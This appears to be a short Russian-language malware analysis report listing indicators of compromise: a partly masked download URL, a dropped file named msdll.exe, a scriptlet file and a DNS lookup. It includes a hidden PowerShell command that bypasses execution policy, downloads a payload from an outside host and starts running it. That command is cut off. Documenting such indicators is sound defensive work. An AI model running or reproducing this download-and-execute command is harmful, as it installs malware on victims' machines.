Техническая информация
- http://th#####ndelight.96.lt/followup/check как %appdata%\msdll.exe
- %TEMP%\abctfhghgdghghГї.sct
- http://th#####ndelight.96.lt/followup/check
- DNS ASK th#####ndelight.96.lt
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://th#####ndelight.96.lt/followup/check','%APPDATA%\msdll.exe');Start-Pro...' (со скрытым окном)